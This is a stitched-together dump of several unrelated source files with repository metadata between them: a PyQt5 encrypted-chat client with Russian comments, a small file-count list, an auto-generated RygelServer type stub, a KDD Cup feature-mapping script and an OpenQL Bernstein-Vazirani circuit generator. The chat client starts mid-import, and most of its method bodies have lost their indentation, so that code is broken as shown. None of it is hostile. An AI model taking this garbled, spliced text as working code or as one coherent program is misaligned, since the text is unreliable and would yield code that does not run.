QListView,
QAction,
QTextEdit,
QFileDialog,
QPushButton,
QLabel,
QHBoxLayout)
from PyQt5.QtGui import QStandardItemModel, QStandardItem, QBrush, QColor, QIcon, QFont, QPixmap
from PyQt5.QtCore import pyqtSlot, QEvent, Qt, QRect
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from PIL import Image
import sys
import json
import logging
import time
import base64
sys.path.append('../')
# Module-level logger for the client side of the application.
client_logger = logging.getLogger('client')
# Main window class of the client application.
class ClientMainWindow(QMainWindow):
    def __init__(self, database, transport, keys):
        """Build the main client window and wire up all UI interactions.

        :param database: client-side database wrapper (contacts, message
            history, avatars).
        :param transport: network transport object talking to the server.
        :param keys: RSA key object used to decrypt incoming messages.
        """
        super().__init__()
        # Core collaborators.
        self.database = database
        self.transport = transport
        # Message decrypter pre-loaded with the client's key.
        self.decrypter = PKCS1_OAEP.new(keys)
        # Load the window layout generated by Qt Designer.
        self.ui = Ui_MainClientWindow()
        self.ui.setupUi(self)
        # "Exit" menu entry.
        self.ui.menu_exit.triggered.connect(qApp.exit)
        # "Send message" button.
        self.ui.btn_send.clicked.connect(self.send_message)
        # "Add contact" button and menu entry.
        self.ui.btn_add_contact.clicked.connect(self.add_contact_window)
        self.ui.menu_add_contact.triggered.connect(self.add_contact_window)
        # "Remove contact" button and menu entry.
        self.ui.btn_remove_contact.clicked.connect(self.delete_contact_window)
        self.ui.menu_del_contact.triggered.connect(self.delete_contact_window)
        # Add an avatar from disk, or pick one stored in the client DB.
        self.ui.menu_add_avatar.triggered.connect(self.add_avat_user)
        self.ui.menu_select_avatar.triggered.connect(self.sel_avat_user)
        # Select avatar (currently disabled):
        # self.ui.btn_avatar.clicked.connect(self.select_avatar)
        # "Go to chat" button.
        self.ui.btn_chat.clicked.connect(self.create_message_for_chat)
        # Search messages by user name.
        self.ui.btn_search.clicked.connect(self.search_mess_on_name)
        # Additional runtime state, filled in once a chat is opened.
        self.contacts_model = None
        self.history_model = None
        self.messages = QMessageBox()
        self.current_chat = None
        self.current_chat_key = None
        self.encryptor = None
        self.ui.list_messages.setHorizontalScrollBarPolicy(
            Qt.ScrollBarAlwaysOff)
        self.ui.list_messages.setWordWrap(True)
        # Double click on a contact opens a chat with that contact.
        self.ui.list_contacts.doubleClicked.connect(self.select_active_user)
        # Toolbar with text-formatting actions and emoticons.
        our_bold = QAction(QIcon('img/b.jpg'), 'Bold', self)
        our_bold.triggered.connect(self.actionBold)
        our_italic = QAction(QIcon('img/i.jpg'), 'Italic', self)
        our_italic.triggered.connect(self.actionItalic)
        our_underlined = QAction(QIcon('img/u.jpg'), 'Underlined', self)
        our_underlined.triggered.connect(self.actionUnderlined)
        smile = QAction(QIcon('img/ab.gif'), 'Smile', self)
        smile.triggered.connect(self.actionSmile)
        melancholy = QAction(QIcon('img/ac.gif'), 'Melancholy', self)
        melancholy.triggered.connect(self.actionMelancholy)
        surprise = QAction(QIcon('img/ai.gif'), 'Surprise', self)
        surprise.triggered.connect(self.actionSurprise)
        # avatar = QAction(QIcon('avatar.jpg'), 'Avatar', self)
        # avatar.triggered.connect(self.actionSelectAvat)
        toolBar = self.addToolBar('Formatting')
        toolBar.addAction(our_bold)
        toolBar.addAction(our_italic)
        toolBar.addAction(our_underlined)
        toolBar.addAction(smile)
        toolBar.addAction(melancholy)
        toolBar.addAction(surprise)
        # toolBar.addAction(avatar)
        self.clients_list_update()
        self.set_disabled_input()
        self.show()
def actionBold(self):
myFont = QFont()
myFont.setBold(True)
self.ui.text_message.setFont(myFont)
def actionItalic(self):
myFont = QFont()
myFont.setItalic(True)
self.ui.text_message.setFont(myFont)
def actionUnderlined(self):
myFont = QFont()
myFont.setUnderline(True)
self.ui.text_message.setFont(myFont)
def actionSmile(self):
url = 'img/ab.gif'
self.ui.text_message.setHtml('<img src="%s" />' % url)
def actionMelancholy(self):
url = 'img/ac.gif'
self.ui.text_message.setHtml('<img src="%s" />' % url)
def actionSurprise(self):
url = 'img/ai.gif'
self.ui.text_message.setHtml('<img src="%s" />' % url)
# def actionSelectAvat(self):
# pass
# Деактивировать поля ввода
def set_disabled_input(self):
# Надпись - получатель.
self.ui.label_new_message.setText(
'Для выбора получателя дважды кликните на нем в окне контактов.')
self.ui.text_message.clear()
if self.history_model:
self.history_model.clear()
# Поле ввода и кнопка отправки неактивны до выбора получателя.
self.ui.btn_clear.setDisabled(True)
self.ui.btn_send.setDisabled(True)
self.ui.text_message.setDisabled(True)
self.encryptor = None
self.current_chat = None
self.current_chat_key = None
# Заполняем историю сообщений.
def history_list_update(self):
# Получаем историю сортированную по дате
list = sorted(
self.database.get_history(
self.current_chat),
key=lambda item: item[3])
# Если модель не создана, создадим.
if not self.history_model:
self.history_model = QStandardItemModel()
self.ui.list_messages.setModel(self.history_model)
# Очистим от старых записей
self.history_model.clear()
# Берём не более 20 последних записей.
length = len(list)
start_index = 0
if length > 20:
start_index = length - 20
# Заполнение модели записями, так-же стоит разделить входящие и исходящие выравниванием и разным фоном.
# Записи в обратном порядке, поэтому выбираем их с конца и не более 20
for i in range(start_index, length):
item = list[i]
if item[1] == 'in':
mess = QStandardItem(
f'Входящее от {item[3].replace(microsecond=0)}:\n {item[2]}')
mess.setEditable(False)
mess.setBackground(QBrush(QColor(255, 213, 213)))
mess.setTextAlignment(Qt.AlignLeft)
self.history_model.appendRow(mess)
else:
mess = QStandardItem(
f'Исходящее от {item[3].replace(microsecond=0)}:\n {item[2]}')
mess.setEditable(False)
mess.setTextAlignment(Qt.AlignRight)
mess.setBackground(QBrush(QColor(204, 255, 204)))
self.history_model.appendRow(mess)
self.ui.list_messages.scrollToBottom()
# Функция обработчик даблклика по контакту
def select_active_user(self):
# Выбранный пользователем (даблклик) находится в выделеном элементе в
# QListView
self.current_chat = self.ui.list_contacts.currentIndex().data()
# вызываем основную функцию
self.set_active_user()
# Функция устанавливающяя активного собеседника
    def set_active_user(self):
        """Activate the chat with ``self.current_chat``.

        Fetches the partner's public key from the server, builds the
        message encryptor, enables the input widgets and loads the
        message history. Aborts with a warning dialog if no key can be
        obtained.
        """
        # Request the partner's public key and build the encryption object.
        try:
            self.current_chat_key = self.transport.key_request(
                self.current_chat)
            client_logger.debug(
                f'Загружен открытый ключ для {self.current_chat}')
            if self.current_chat_key:
                self.encryptor = PKCS1_OAEP.new(
                    RSA.import_key(self.current_chat_key))
        except (OSError, json.JSONDecodeError):
            # Transport failure or malformed server response — drop any
            # stale key/encryptor so we fail closed below.
            self.current_chat_key = None
            self.encryptor = None
            client_logger.debug(
                f'Не удалось получить ключ для {self.current_chat}')
        # Without a key the chat cannot be started: warn and bail out.
        if not self.current_chat_key:
            self.messages.warning(
                self, 'Ошибка', 'Для выбранного пользователя нет ключа шифрования.')
            return
        # Set the caption and enable the input widgets.
        self.ui.label_new_message.setText(
            f'Введите сообщенние для {self.current_chat}:')
        self.ui.btn_clear.setDisabled(False)
        self.ui.btn_send.setDisabled(False)
        self.ui.text_message.setDisabled(False)
        # Fill the window with the history for this user.
        self.history_list_update()
# Функция обновляющяя контакт лист
def clients_list_update(self):
contacts_list = self.database.get_contacts()
self.contacts_model = QStandardItemModel()
for i in sorted(contacts_list):
item = QStandardItem(i)
item.setEditable(False)
self.contacts_model.appendRow(item)
self.ui.list_contacts.setModel(self.contacts_model)
# Функция добавления контакта
    def add_contact_window(self):
        """Open the 'add contact' dialog.

        The dialog is stored in a module-level global — presumably to
        keep a reference alive so it is not garbage-collected while
        shown (TODO: confirm; an instance attribute would be cleaner).
        """
        global select_dialog
        select_dialog = AddContactDialog(self.transport, self.database)
        # On OK, hand the dialog to the handler that reads the selection.
        select_dialog.btn_ok.clicked.connect(
            lambda: self.add_contact_action(select_dialog))
        select_dialog.show()
# Функция - обработчик добавления, сообщает серверу, обновляет таблицу и
# список контактов
def add_contact_action(self, item):
new_contact = item.selector.currentText()
self.add_contact(new_contact)
item.close()
# Функция добавляющяя контакт в базы
def add_contact(self, new_contact):
try:
self.transport.add_contact(new_contact)
except ServerError as err:
self.messages.critical(self, 'Ошибка сервера', err.text)
except OSError as err:
if err.errno:
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
self.messages.critical(self, 'Ошибка', 'Таймаут соединения!')
else:
self.database.add_contact(new_contact)
new_contact = QStandardItem(new_contact)
new_contact.setEditable(False)
self.contacts_model.appendRow(new_contact)
client_logger.info(f'Успешно добавлен контакт {new_contact}')
self.messages.information(
self, 'Успех', 'Контакт успешно добавлен.')
# Функция удаления контакта
    def delete_contact_window(self):
        """Open the 'remove contact' dialog.

        The dialog is stored in a module-level global — presumably to
        keep a reference alive so it is not garbage-collected while
        shown (TODO: confirm; an instance attribute would be cleaner).
        """
        global remove_dialog
        remove_dialog = DelContactDialog(self.database)
        # On OK, hand the dialog to the handler that performs removal.
        remove_dialog.btn_ok.clicked.connect(
            lambda: self.delete_contact(remove_dialog))
        remove_dialog.show()
# Функция обработчик удаления контакта, сообщает на сервер, обновляет
# таблицу контактов
def delete_contact(self, item):
selected = item.selector.currentText()
try:
self.transport.remove_contact(selected)
except ServerError as err:
self.messages.critical(self, 'Ошибка сервера', err.text)
except OSError as err:
if err.errno:
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
self.messages.critical(self, 'Ошибка', 'Таймаут соединения!')
else:
self.database.del_contact(selected)
self.clients_list_update()
client_logger.info(f'Успешно удалён контакт {selected}')
self.messages.information(self, 'Успех', 'Контакт успешно удалён.')
item.close()
# Если удалён активный пользователь, то деактивируем поля ввода.
if selected == self.current_chat:
self.current_chat = None
self.set_disabled_input()
# Функция отправки собщения пользователю.
def send_message(self):
# Текст в поле, проверяем что поле не пустое затем забирается сообщение
# и поле очищается
message_text = self.ui.text_message.toPlainText()
self.ui.text_message.clear()
if not message_text:
return
# Шифруем сообщение ключом получателя и упаковываем в base64.
message_text_encrypted = self.encryptor.encrypt(
message_text.encode('utf8'))
message_text_encrypted_base64 = base64.b64encode(
message_text_encrypted)
try:
self.transport.send_message(
self.current_chat,
message_text_encrypted_base64.decode('ascii'))
pass
except ServerError as err:
self.messages.critical(self, 'Ошибка', err.text)
except OSError as err:
if err.errno:
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
self.messages.critical(self, 'Ошибка', 'Таймаут соединения!')
except (ConnectionResetError, ConnectionAbortedError):
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
else:
self.database.save_message(self.current_chat, 'out', message_text)
client_logger.debug(
f'Отправлено сообщение для {self.current_chat}: {message_text}')
self.history_list_update()
# Слот приёма нового сообщений
    @pyqtSlot(dict)
    def message(self, message):
        """Slot for an incoming message from the transport.

        Decrypts the payload, stores it in the local history and either
        refreshes the open chat or offers to open/add a chat with the
        sender.

        :param message: protocol dict containing at least the sender name
            and the base64-encoded encrypted text.
        """
        # Recover the raw ciphertext bytes from base64.
        encrypted_message = base64.b64decode(message[MESSAGE_TEXT])
        # Decrypt; on failure warn the user and abort.
        try:
            decrypted_message = self.decrypter.decrypt(encrypted_message)
        except (ValueError, TypeError):
            self.messages.warning(
                self, 'Ошибка', 'Не удалось декодировать сообщение.')
            return
        # Save the message and refresh the history, or open a new chat.
        # NOTE(review): this saves under self.current_chat BEFORE checking
        # the sender — if the sender is not the open chat (or no chat is
        # open), the record lands under the wrong contact. Verify intent.
        self.database.save_message(
            self.current_chat,
            'in',
            decrypted_message.decode('utf8'))
        sender = message[SENDER]
        if sender == self.current_chat:
            self.history_list_update()
        else:
            # Is the sender already in our contact list?
            if self.database.check_contact(sender):
                # Known contact: offer to open a chat with them.
                if self.messages.question(
                        self,
                        'Новое сообщение',
                        f'Получено новое сообщение от {sender}, открыть чат с ним?',
                        QMessageBox.Yes,
                        QMessageBox.No) == QMessageBox.Yes:
                    self.current_chat = sender
                    self.set_active_user()
            else:
                print('NO')
                # Unknown sender: offer to add them to contacts first.
                if self.messages.question(
                        self,
                        'Новое сообщение',
                        f'Получено новое сообщение от {sender}.\n Данного пользователя нет в вашем контакт-листе.\n Добавить в контакты и открыть чат с ним?',
                        QMessageBox.Yes,
                        QMessageBox.No) == QMessageBox.Yes:
                    self.add_contact(sender)
                    self.current_chat = sender
                    # Re-save the message: the earlier save happened before
                    # the contact existed, so it would otherwise be lost.
                    self.database.save_message(
                        self.current_chat, 'in', decrypted_message.decode('utf8'))
                    self.set_active_user()
# Слот потери соединения
# Выдаёт сообщение о ошибке и завершает работу приложения
@pyqtSlot()
def connection_lost(self):
self.messages.warning(
self,
'Сбой соединения',
'Потеряно соединение с сервером. ')
self.close()
# Слот сообщения 205 - требование сервером обновить справочники доступных пользователей и контактов
# Может получиться так, что удалён текущий собеседник, надо проверить это и закрыть чат с предупреждением.
# иначе просто обновить список контактов, без выдачи предупреждения
# пользователю.
@pyqtSlot()
def sig_205(self):
if self.current_chat and not self.database.check_user(
self.current_chat):
self.messages.warning(
self,
'Сочувствую',
'К сожалению собеседник был удалён с сервера.')
self.set_disabled_input()
self.current_chat = None
self.clients_list_update()
    def make_connection(self, trans_obj):
        """Wire the transport object's Qt signals to this window's slots.

        Args:
            trans_obj: client transport exposing the ``new_message``,
                ``connection_lost`` and ``message_205`` signals.
        """
        trans_obj.new_message.connect(self.message)
        trans_obj.connection_lost.connect(self.connection_lost)
        trans_obj.message_205.connect(self.sig_205)
# Функция добавления аватара
def add_avat_user(self):
fname = QFileDialog.getOpenFileName(
self, 'Open file', '/home/picforavat')[0]
self.fname = fname
file = Image.open(self.fname)
width = 60
height = 50
# Изменяем размер изображения
our_pict = file.resize((width, height), Image.BICUBIC)
our_pict.save("avatar.jpg")
file = open("avatar.jpg", "rb")
our_pict = file.read()
file.close()
# Добавляем в БД
self.database.add_avatar(our_pict)
# Обрезаем изображение
file = Image.open("avatar.jpg")
our_pict = file.crop((0, 0, 50, 40))
our_pict.save("avatar.jpg")
# Меняем аватар в окне клиента на новый
pixmap = QPixmap('avatar.jpg')
self.ui.avatar.setPixmap(pixmap)
self.ui.avatar.resize(300, 300)
self.ui.avatar.setGeometry(QRect(300, 425, 45, 35))
file = open("avatar.jpg", "rb")
our_pict = file.read()
file.close()
# Добавляем в БД
self.database.add_avatar(our_pict)
    def sel_avat_user(self):
        """Placeholder slot for selecting an existing avatar; only logs for now."""
        print('ok')
    def chat_history_update(self):
        """Reload the chat-room message list view from the transport.

        Lazily creates the Qt item model on first use, appends at most the
        20 most recent messages and scrolls the view to the bottom.
        """
        # Reset (or lazily create) the model backing the list view.
        if self.history_model:
            self.history_model.clear()
        if not self.history_model:
            self.history_model = QStandardItemModel()
            self.ui.list_messages.setModel(self.history_model)
        list_messages = self.transport.get_chat_message()
        # Keep no more than the 20 most recent records.
        length = len(list_messages)
        start_index = 0
        if length > 20:
            start_index = length - 20
        for i in range(start_index, length):
            item = list_messages[i]
            # item layout: presumably (sender, text) — TODO confirm against
            # transport.get_chat_message().
            mess = QStandardItem(
                f'Сообщение от {item[0]}:\n {item[1]}')
            mess.setEditable(False)
            #mess.setBackground(QBrush(QColor(255, 213, 213)))
            mess.setTextAlignment(Qt.AlignLeft)
            self.history_model.appendRow(mess)
        self.ui.list_messages.scrollToBottom()
# Функция отправляет на сервер сообщение, которое направлено в чат
def create_message_for_chat(self):
self.chat_history_update()
# Текст в поле, проверяем что поле не пустое затем забирается сообщение
# и поле очищается
message_text = self.ui.text_message.toPlainText()
self.ui.text_message.clear()
self.ui.label_new_message.setText(
f'Введите сообщенние в чат')
self.ui.text_message.setDisabled(False)
if not message_text:
return
try:
self.transport.send_message_to_chat(message_text)
# message_text_encrypted_base64.decode('ascii'))
pass
except ServerError as err:
self.messages.critical(self, 'Ошибка', err.text)
except OSError as err:
if err.errno:
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
self.messages.critical(self, 'Ошибка', 'Таймаут соединения!')
except (ConnectionResetError, ConnectionAbortedError):
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
else:
self.chat_history_update()
# Функция поиска истории сообщений по имени пользователя
def search_mess_on_name(self):
usv = self.ui.text_message.toPlainText()
self.ui.text_message.clear()
self.ui.text_message.setDisabled(False)
if not usv:
return
list_contacts = self.database.get_contacts()
if usv in list_contacts:
if self.history_model:
self.history_model.clear()
if not self.history_model:
self.history_model = QStandardItemModel()
self.ui.list_messages.setModel(self.history_model)
list_messages = self.database.get_history(usv)
length = len(list_messages)
start_index = 0
if length > 20:
start_index = length - 20
for i in range(start_index, length):
item = list_messages[i]
if item[1] == 'out':
mess = QStandardItem(
f'Я:\n Сообщение от {item[3].replace(microsecond=0)}:\n {item[2]}')
mess.setEditable(False)
# mess.setBackground(QBrush(QColor(255, 213, 213)))
mess.setTextAlignment(Qt.AlignLeft)
self.history_model.appendRow(mess)
elif item[1] == 'in':
mess = QStandardItem(
f'{usv}:\n Сообщение от {item[3].replace(microsecond=0)}:\n {item[2]}')
mess.setEditable(False)
# mess.setBackground(QBrush(QColor(255, 213, 213)))
mess.setTextAlignment(Qt.AlignLeft)
self.history_model.appendRow(mess)
self.ui.list_messages.scrollToBottom()
else:
if self.history_model:
self.history_model.clear()
mess = QStandardItem(
'Пользователя с таким именем у вас в контактах нет')
mess.setEditable(False)
mess.setBackground(QBrush(QColor(255, 213, 213)))
mess.setTextAlignment(Qt.AlignLeft)
self.history_model.appendRow(mess)
| [
"spoliv@rambler.ru"
] | spoliv@rambler.ru |
3d0cfb8549a4333779da65805f245c044c3a7739 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nncai.py | 87e46160893ad96819ed62acdeb66ef9cf5cbad3 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 219 | py | ii = [('LyelCPG2.py', 1), ('MarrFDI.py', 1), ('LeakWTI2.py', 2), ('LeakWTI3.py', 5), ('PettTHE.py', 2), ('WilkJMC2.py', 1), ('GodwWLN.py', 1), ('LeakWTI.py', 2), ('BachARE.py', 1), ('MackCNH2.py', 1), ('SomeMMH.py', 1)] | [
"varunwachaspati@gmail.com"
] | varunwachaspati@gmail.com |
8c9a9f741726da776b4308350bc36ee2122176dc | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/RygelServer/HTTPGetHandlerPrivate.py | abf284586181e910e051275ee24086b26ae3ec76 | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,491 | py | # encoding: utf-8
# module gi.repository.RygelServer
# from /usr/lib64/girepository-1.0/RygelServer-2.6.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.Gee as __gi_repository_Gee
import gi.repository.GUPnP as __gi_repository_GUPnP
import gi.repository.RygelCore as __gi_repository_RygelCore
import gobject as __gobject
class HTTPGetHandlerPrivate(__gi.Struct):
    """Auto-generated stub for the opaque RygelServer ``HTTPGetHandlerPrivate``
    struct; exists only to give IDEs signature information. Do not edit by
    hand — the generator header above states all changes will be lost."""
    def __delattr__(self, *args, **kwargs): # real signature unknown
        """ Implement delattr(self, name). """
        pass
    def __dir__(self, *args, **kwargs): # real signature unknown
        """ Default dir() implementation. """
        pass
    def __eq__(self, *args, **kwargs): # real signature unknown
        """ Return self==value. """
        pass
    def __format__(self, *args, **kwargs): # real signature unknown
        """ Default object formatter. """
        pass
    def __getattribute__(self, *args, **kwargs): # real signature unknown
        """ Return getattr(self, name). """
        pass
    def __ge__(self, *args, **kwargs): # real signature unknown
        """ Return self>=value. """
        pass
    def __gt__(self, *args, **kwargs): # real signature unknown
        """ Return self>value. """
        pass
    def __hash__(self, *args, **kwargs): # real signature unknown
        """ Return hash(self). """
        pass
    def __init_subclass__(self, *args, **kwargs): # real signature unknown
        """
        This method is called when a class is subclassed.
        The default implementation does nothing. It may be
        overridden to extend subclasses.
        """
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    def __le__(self, *args, **kwargs): # real signature unknown
        """ Return self<=value. """
        pass
    def __lt__(self, *args, **kwargs): # real signature unknown
        """ Return self<value. """
        pass
    @staticmethod # known case of __new__
    def __new__(*args, **kwargs): # real signature unknown
        """ Create and return a new object. See help(type) for accurate signature. """
        pass
    def __ne__(self, *args, **kwargs): # real signature unknown
        """ Return self!=value. """
        pass
    def __reduce_ex__(self, *args, **kwargs): # real signature unknown
        """ Helper for pickle. """
        pass
    def __reduce__(self, *args, **kwargs): # real signature unknown
        """ Helper for pickle. """
        pass
    def __repr__(self, *args, **kwargs): # real signature unknown
        """ Return repr(self). """
        pass
    def __setattr__(self, *args, **kwargs): # real signature unknown
        """ Implement setattr(self, name, value). """
        pass
    def __sizeof__(self, *args, **kwargs): # real signature unknown
        """ Size of object in memory, in bytes. """
        pass
    def __str__(self, *args, **kwargs): # real signature unknown
        """ Return str(self). """
        pass
    def __subclasshook__(self, *args, **kwargs): # real signature unknown
        """
        Abstract classes can override this to customize issubclass().
        This is invoked early on by abc.ABCMeta.__subclasscheck__().
        It should return True, False or NotImplemented. If it returns
        NotImplemented, the normal algorithm is used. Otherwise, it
        overrides the normal algorithm (and the outcome is cached).
        """
        pass
    def __weakref__(self, *args, **kwargs): # real signature unknown
        pass
    # Stub attribute placeholders; the "(!)" comments record the real
    # runtime values reported by the stub generator.
    __class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
    __dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(HTTPGetHandlerPrivate), '__module__': 'gi.repository.RygelServer', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'HTTPGetHandlerPrivate' objects>, '__weakref__': <attribute '__weakref__' of 'HTTPGetHandlerPrivate' objects>, '__doc__': None})"
    __gtype__ = None # (!) real value is '<GType void (4)>'
    __info__ = StructInfo(HTTPGetHandlerPrivate)
| [
"ttys3@outlook.com"
] | ttys3@outlook.com |
d035d1dae19cfea09c2da4df135bd31e7906ddb9 | a4bb0cde9697aa0c85375764d8353da0e1422525 | /mapping_features_fn.py | a369e667d81b360cd2deaeb73b8053108bdcc8fc | [] | no_license | JanzYe/KDD_CUP_2012_Track2 | 5dd529eb1ca0592ab2ea71bda9416a756fc3a0b5 | 027f4a6025814278c82f68da1cb19ef8f3fb1f1a | refs/heads/master | 2020-04-16T06:23:21.419074 | 2019-01-14T06:55:29 | 2019-01-14T06:55:29 | 165,344,529 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,440 | py | '''
This script should run on raw user feature files.
'''
# total number of records in training.txt is almost 150000000, exactly 149639105
# divide the training.txt to feature_mapped_train and feature_mapped_valid
# feature_mapped_train(120000000), feature_mapped_valid(30000000)
# data_descriptionid, data_purchasedkeywordid, data_queryid, data_titleid, gender, age are not need to mapping, because every records are distinct,
# and their id can consider as the value after mapping
# input = "/home/yezhizi/Documents/python/2018DM_Project/track2/training.txt"
# new_train = "data/feature_mapped_train.data"
# new_valid = "data/feature_mapped_valid.data"
# Input corpus and output path for this run (combined training set).
# NOTE(review): `input` shadows the Python builtin of the same name.
input = "/home/yezhizi/Documents/python/2018DM_Project/track2/training_combined.txt"
mapped = "data/feature_mapped_combined_training.data"
# input = "/home/yezhizi/Documents/python/2018DM_Project/track2/test_combined.txt"
# mapped = "data/feature_mapped_combined_test.data"
# features_mapping = "data/features_mapping_fn.pkl"
# Pickled {feature name -> Feature} dictionary produced by the mapping pass.
features_mapping = "data/features_mapping_combined.pkl"
# number_of_training = 120000000
# number_of_training = 120000
import pickle as pkl
class Feature:
    """Bookkeeping record for one categorical feature.

    Attributes:
        name: the feature's column name (e.g. "AdID").
        values: set of distinct raw values observed for this feature.
        mapping: dict mapping a raw value to its index; None until built.
    """
    def __init__(self, name):
        # Start with an empty value set and no mapping; both are filled in
        # later by the mapping-construction pass.
        self.name, self.values, self.mapping = name, set(), None
# Load the previously-built value->index mapping for every feature.
with open(features_mapping, 'rb') as f:
    print('features mapping loading ... ')
    features = pkl.load(f)
    print('features mapping loaded')
# Column order of the raw file after the first two count columns
# (clicks, impressions).
feat_names = [
    'DisplayURL',
    'AdID',
    'AdvertiserID',
    'Depth',
    'Position',
    'QueryID',
    'KeywordID',
    'TitleID',
    'DescriptionID',
    'Gender',
    'Age',
]
# Convert every raw record into "ctr,mapped_feature_1,...,mapped_feature_n".
# (Removed: unused `user_offsets`/`offset` variables and the redundant
# fr.close()/fw.close() calls — the `with` block already closes both files.)
with open(input) as fr, open(mapped, 'w') as fw:
    for idx, line in enumerate(fr):
        records = line.strip().split("\t")
        # Columns 0 and 1 are clicks and impressions.
        ctr = 1.0 * int(records[0]) / int(records[1])
        to_write = str(ctr)
        for i in range(2, len(records)):
            val = int(records[i])
            keywords = feat_names[i - 2]
            # Values never seen during mapping construction fall back to
            # the index reserved for raw value 0.
            if val not in features[keywords].mapping:
                val = 0
            to_write = to_write + ',' + str(features[keywords].mapping[val])
        to_write = to_write + "\n"
        fw.write(to_write)
        # Progress report every 200k lines.
        if (idx + 1) % 200000 == 0:
            print(idx + 1)
            print(to_write)
| [
"1173865843@qq.com"
] | 1173865843@qq.com |
69ff0d97a85477dcd1228d5e42b4be7da7365da2 | 0e25dc15ae9efce8bfd716d4d2041da07767968b | /qbench/benchmarks/QLib/OPENQL_converted/benstein_vazirani_41b_secret_32.py | 245553254e73295a001dbe1eb9cb042f6d2efc45 | [] | no_license | alxhotel/crossbar-bench | f608fc0062b4f8a5162ec33d61c0204aaf27b6ff | 3bf7536e7697d29c3089b0ba564ba22d39698b88 | refs/heads/master | 2021-07-13T16:06:50.085838 | 2020-10-04T23:39:05 | 2020-10-04T23:39:05 | 213,409,122 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,090 | py | from openql import openql as ql
import os
import argparse
def circuit(config_file, new_scheduler='yes', scheduler='ASAP', uniform_sched='no', sched_commute='yes', mapper='base', moves='no', maptiebreak='random', initial_placement='no', output_dir_name='test_output', optimize='no', measurement=True, log_level='LOG_WARNING'):
    """Compile the 41-bit Bernstein-Vazirani circuit with secret value 32.

    Qubits 0-40 form the input register and qubit 41 is the oracle ancilla
    (the platform declares 43 qubits in total). Secret 32 = 0b100000 has
    only bit 5 set, so the oracle is a single CNOT from qubit 5 onto the
    ancilla.

    Args:
        config_file: path, relative to this file, of the OpenQL platform
            configuration JSON.
        measurement: when True, append a measure gate on every qubit.
        All remaining arguments are forwarded verbatim to ``ql.set_option``.
    """
    curdir = os.path.dirname(__file__)
    output_dir = os.path.join(curdir, output_dir_name)
    ql.set_option('output_dir', output_dir)
    ql.set_option('optimize', optimize)
    ql.set_option('scheduler', scheduler)
    ql.set_option('scheduler_uniform', uniform_sched)
    ql.set_option('mapper', mapper)
    ql.set_option('initialplace', initial_placement)
    ql.set_option('log_level', log_level)
    ql.set_option('scheduler_post179', new_scheduler)
    ql.set_option('scheduler_commute', sched_commute)
    ql.set_option('mapusemoves', moves)
    ql.set_option('maptiebreak', maptiebreak)
    config_fn = os.path.join(curdir, config_file)
    platform = ql.Platform('starmon', config_fn)
    sweep_points = [1, 2]
    num_circuits = 1
    num_qubits = 43
    p = ql.Program('benstein_vazirani_41b_secret_32', platform, num_qubits)
    p.set_sweep_points(sweep_points, num_circuits)
    k = ql.Kernel('benstein_vazirani_41b_secret_32', platform, num_qubits)
    # Prepare the ancilla (qubit 41) in |->.
    k.gate('prepz', [41])
    k.gate('x', [41])
    # Hadamard the whole working register (inputs 0-40 plus the ancilla).
    # The generated original spelled out these 42 gates one per line.
    for q in range(42):
        k.gate('h', [q])
    # Oracle for secret 32: only input bit 5 feeds the ancilla.
    k.gate('cnot', [5, 41])
    # Final Hadamard layer leaves the secret string on the input register.
    for q in range(42):
        k.gate('h', [q])
    if measurement:
        for q in range(num_qubits):
            k.gate('measure', [q])
    p.add_kernel(k)
    p.compile()
    # Restore the mapper option so subsequent compilations are unaffected.
    ql.set_option('mapper', 'no')
if __name__ == '__main__':
    # Command-line front end: each option is forwarded to circuit().
    # NOTE(review): user-facing help typos ("shceduler actication") and the
    # unused --measurement value are left as generated.
    parser = argparse.ArgumentParser(description='OpenQL compilation of a Quantum Algorithm')
    parser.add_argument('config_file', help='Path to the OpenQL configuration file to compile this algorithm')
    parser.add_argument('--new_scheduler', nargs='?', default='yes', help='Scheduler defined by Hans')
    parser.add_argument('--scheduler', nargs='?', default='ASAP', help='Scheduler specification (ASAP (default), ALAP, ...)')
    parser.add_argument('--uniform_sched', nargs='?', default='no', help='Uniform shceduler actication (yes or no)')
    parser.add_argument('--sched_commute', nargs='?', default='yes', help='Permits two-qubit gates to be commutable')
    parser.add_argument('--mapper', nargs='?', default='base', help='Mapper specification (base, minextend, minextendrc)')
    parser.add_argument('--moves', nargs='?', default='no', help='Let the use of moves')
    parser.add_argument('--maptiebreak', nargs='?', default='random', help='')
    parser.add_argument('--initial_placement', nargs='?', default='no', help='Initial placement specification (yes or no)')
